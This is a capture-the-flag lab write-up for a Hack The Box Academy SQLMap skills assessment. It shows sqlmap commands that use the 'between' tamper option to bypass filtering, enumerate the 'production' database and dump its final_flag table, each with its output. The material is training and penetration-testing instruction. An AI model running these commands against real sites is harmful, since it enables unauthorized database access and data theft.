Skills Assessment

You are given access to a web application with basic protection mechanisms. Use the skills learned in this module to find the SQLi vulnerability with SQLMap and exploit it accordingly. To complete this module, find the flag and submit it here.

What's the contents of table final_flag?

Our target IP : http://94.237.52.235:34282/

Target Website :

You need to explore with Burp the target website and find Where you have an id to use SQLMap. When you click on "ADD TO CART+" you got this :

So, now, copy the request to file (req.txt):

When you have your file, you can enumerate the target website with SQLMap :

┌─[eu-academy-3]─[10.10.14.253]─[htb-ac-1811357@htb-o2dzd1r718]─[~/Desktop]
└──╼ [★]$ sqlmap -r req.txt --current-user --current-db --tamper=between
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

...SNIP...

current user: 'admin@localhost'
[09:32:46] [INFO] fetching current database
[09:32:46] [INFO] retrieved: production
current database: 'production'

...SNIP...

[*] ending @ 09:33:21 /2026-01-13/

So, our database is "production". Now, we need to enumerate this database to find the "final_flag" table :

┌─[eu-academy-3]─[10.10.14.253]─[htb-ac-1811357@htb-o2dzd1r718]─[~/Desktop]
└──╼ [★]$ sqlmap -r req.txt --tamper=between -D production --tables --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

...SNIP...

Database: production
[5 tables]
+-------------+
| brands      |
| categories  |
| final_flag  |
| order_items |
| products    |
+-------------+

...SNIP...

Get the "final_flag" table informations :

┌─[eu-academy-3]─[10.10.14.253]─[htb-ac-1811357@htb-o2dzd1r718]─[~/Desktop]
└──╼ [★]$ sqlmap -r req.txt --tamper=between -dump -T final_flag -D production
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

...SNIP...

Database: production
Table: final_flag
[1 entry]
+----+--------------------------+
| id | content                  |
+----+--------------------------+
| 1  | HTB{xxx_xx_xxxx_xxxxxxx} |
+----+--------------------------+

...SNIP...

PreviousOS Exploitation NextXSS Basics

Last updated 24 days ago